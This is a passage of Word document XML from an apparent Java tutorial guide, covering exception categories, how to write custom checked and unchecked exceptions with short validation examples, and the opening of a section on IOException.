      </w:tr>
      <w:tr w:rsidR="009B4E28" w:rsidRPr="00CE4B95" w14:paraId="448BC216" w14:textId="77777777" w:rsidTr="006C0087">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1406D894"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rror</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65AF5079"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11AF2054"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0677FF5A"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utOfMemoryError, StackOverflowError</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4E28" w:rsidRPr="00CE4B95" w14:paraId="3AB72E12" w14:textId="77777777" w:rsidTr="006C0087">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40A1AE25"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hecked Exception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15A2875A"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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="172F4D3B"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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CB2997E"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OException, SQLException</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4E28" w:rsidRPr="00CE4B95" w14:paraId="1FD4667C" w14:textId="77777777" w:rsidTr="006C0087">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="206F4454"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untimeException</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="679D118C"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FB70932"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BE874C3" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E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ullPointerException, ArithmeticException</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50DE5D04" w14:textId="3E8C74BC" w:rsidR="00595923" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00595923">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="06A33748">
          <v:rect id="_x0000_i1604" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC0403D" w14:textId="1CED0F1F" w:rsidR="00E54BB5" w:rsidRPr="00CE4B95" w:rsidRDefault="00E54BB5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="201" w:name="_Toc196307681"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to create </w:t>
      </w:r>
      <w:r w:rsidR="00865D33" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ustom </w:t>
      </w:r>
      <w:r w:rsidR="00865D33" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>xceptions?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201"/>
    </w:p>
    <w:p w14:paraId="600D973B" w14:textId="43407EB4" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Creating a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java is simple and useful when you want to throw application-specific exceptions with meaningful names and messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046F8CF3" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DB345E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="2848013C">
          <v:rect id="_x0000_i1605" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="467F09F0" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">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Steps to Create a Custom Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AD16DB" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">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1. Extend the appropriate base class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15527ACC" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="920"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Checked Exception:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Extend Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183D902C" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="920"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Unchecked Exception:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Extend RuntimeException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD093F9" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DB345E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="6D642BCB">
          <v:rect id="_x0000_i1606" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C95C79" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">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Example 1: Custom Checked Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FED5D75"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Custom Checked Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702720A0"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public class InvalidAgeException extends Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281B9323"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public InvalidAgeException(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E866AD"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super(message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B7E732"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042D35AB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5570A60E" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D9F451F"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Using it in code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422B8E87"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public class Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C07A9D6"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public static void validateAge(int age) throws InvalidAgeException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0B3395"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if (age &lt; 18) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C6C7D9"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throw new InvalidAgeException("Age must be 18 or above.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EDBF41"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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CED7E9"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System.out.println("Valid age");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723DE16E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFE265B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13125265" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40EF9E4B"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43988687"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6DB65E"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validateAge(16);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FA1F60"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 catch (InvalidAgeException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A925695"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System.out.println("Exception caught: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B104827"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AACD896"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FDB2DB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C35685" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DB345E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="36F0F226">
          <v:rect id="_x0000_i1607" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDB19C9" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">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Example 2: Custom Unchecked Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76791C64"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Custom Unchecked Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F432982"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lastRenderedPageBreak/>
        <w:t>public class InvalidNameException extends RuntimeException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9C1965"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public InvalidNameException(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7587283B"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super(message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1F590A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A7CD58"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7D7459" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE549D4"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Using it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104E3F82"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public class Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E70A83"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public static void validateName(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8B047A"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if (name == null || name.isEmpty()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4637A1B3"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throw new InvalidNameException("Name cannot be empty.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4320A6"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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D486B3B"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System.out.println("Valid name");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4671A0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F81F3FE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377A548E" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B0A9A09"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C42BEE"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validateName(""); // Will throw exception at runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D60939"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2CBFA6" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C12B61" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DB345E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="548668C1">
          <v:rect id="_x0000_i1608" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAA0D8A" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">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Key Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD65727" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="921"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>checked</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> exceptions when the caller is expected to handle it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DA3BED" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="921"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unchecked</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> exceptions for programming errors or illegal states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7039B4E2" w14:textId="77777777" w:rsidR="00136D73" w:rsidRPr="00CE4B95" w:rsidRDefault="00136D73" w:rsidP="00DB345E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="921"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Always provide a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>meaningful message</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE38510" w14:textId="76874719" w:rsidR="00595923" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00595923">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="1C795A3B">
          <v:rect id="_x0000_i1609" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5668F3AB" w14:textId="77777777" w:rsidR="003E6A16" w:rsidRPr="00CE4B95" w:rsidRDefault="003E6A16">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="202" w:name="_Toc196307682"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to handle IOException?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202"/>
    </w:p>
    <w:p w14:paraId="294D8471" w14:textId="17A021B9" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E507C">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is thrown when there is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
